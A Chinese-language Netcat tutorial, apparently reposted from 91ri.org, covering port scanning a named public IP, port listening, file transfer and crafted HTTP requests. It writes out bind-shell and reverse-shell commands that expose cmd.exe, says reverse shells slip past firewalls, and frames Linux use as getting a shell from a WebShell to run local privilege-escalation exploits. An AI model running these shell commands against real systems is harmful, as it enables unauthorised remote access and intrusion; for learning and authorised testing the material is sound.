Netcat使用手册

在网络工具中有“瑞士军刀”美誉的NetCat,在我们用了N年了至今仍是爱不释手。因为它短小精悍。

连接到某处:

nc [-options] hostname port[s] [ports] …

监听端口等待连接:

nc -l -p port [-options] [hostname] [port]

主要参数:

主要用途

一般我们使用netcat做的最多的事情为以下三种:

1、 扫描指定IP端口情况

2、 端口转发数据(重点)

3、提交自定义数据包

以下IP 处可以使用域名,nc会调用NDS解析成IP地址。

【命令】nc -v ip port

nc -v 96.44.174.9 80

扫瞄某 IP 的某个端口,返回端口信息详细输出。

nc -v -z ip port-port

nc -v -z 96.44.174.9 80-1024

扫描某IP的端口段,返回端口信息详细输出,但扫描速度很慢。

nc -v -z -u ip port-port

nc -v -z -u 96.44.174.9 25-1024

扫描某 IP 的某 UDP 端口段,返回端口信息详细输出,但扫描速度很慢。

nc -nvv -w2 -z ip port-port

nc -nvv -w2 -z 96.44.174.9 80-1024

扫锚某IP的端口段,连接超时时间为2秒。

实例:

总结:使用nc扫描速度真的不敢恭维,而且对于扫描主机存活、端口等还是交给更专业的nmap来进行,物尽其用才是硬道理,这里全当科普。

2、监听端口、连接端口、转发端口常用命令。

【命令】nc -l -p 520

开启本机的 TCP 520 端口并监听次端口的上传输的数据。

【命令】nc -l -v -p 520

开启本机的 TCP 520 端口并将监听到的信息输出到当前 CMD 窗口。这个命令也是端口转发shell的基础。

nc -l -p 520 > C:/log.dat

开启本机的 TCP 520 端口并将监听到的信息输出到 C:/log.dat 下的日志文件里。

nc -nvv 192.168.1.101 520

连接到192.168.1.101主机的 520。

nc -l -p 2012 -t -e C:WINDOWSsystem32cmd.exe

nc -nvv 192.168.1.101 2012

采用正向连接方式,远程主机 上运行 nc -l -p 2012 -t -e cmd.exe 意为绑定远程主机的 CMD 到2012 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell ;在本地主机上运行 nc -nvv 192.168.1.101 2012 用于连接已经将 CMD 重定向到 2012 端口的远程主机 。

nc -l –vv -p 2012

nc -t -e C:WINDOWSsystem32cmd.exe 192.168.1.102 2012

采用反向连接方式,先在本地主机运行 nc -l –vv -p 2012 开启2012 端口并监听等待远程主机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.102 2012 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.102 端口号为2012 的主机上,连接成功后 IP 地址为 192.168.1.102 的主机会得到一个CMD Shell。

总结:这个情况是最常用的内网端口转发功能,这样反弹shell即可执行命令。反向连接就是常用的反弹shell到本地,因为由主机主动发送的情况本地防火墙等设备一般不会去拦截,而正向连接到远程主机的某端口常常被拦截。

实例:

nc -vv www.91ri.org port < C:/http.txt

nc -vv www.91ri.org 80 < C:/http.txt

提交http.txt内数据包到www.91ri.org的80端口,-vv参数会使速度变慢,但可以跟踪过程。例如IISput漏洞就可以自定义数据包使用此方法提交。

nc -v -n ip port < C:/sunzn.exe

nc -v -l -p port > D:/sunzn.exe

在本地运行 nc -v -n ip port < C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容,并把这些数据发送到远程主机的对应端口上 ,在远程主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并把接收到的信息数据写到 D:/sunzn.exe 中,两行命令实现了文件在本地主机和远程主机间的传输。

传输http数据包实例:

好东西肯定需要在不同的环境中都能使用,在linux环境中同样有着netcat可以使用。主要过程如下。

Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。

主要步骤:

1、wget一个tar压缩的nc

2、解压文件

3、解压完毕之后会生成目录

4、配置环境

5、配置完了之后就可以编译了。

6、编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat文件就是我们的nc了。

远程Linux转发命令

日币奖励:

本文为原创科普型文章,首发91ri.org,作者详细的将netcat的常见命令列出并配以实例,适合新手阅读,根据本站积分规则给予日币奖励共6枚。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值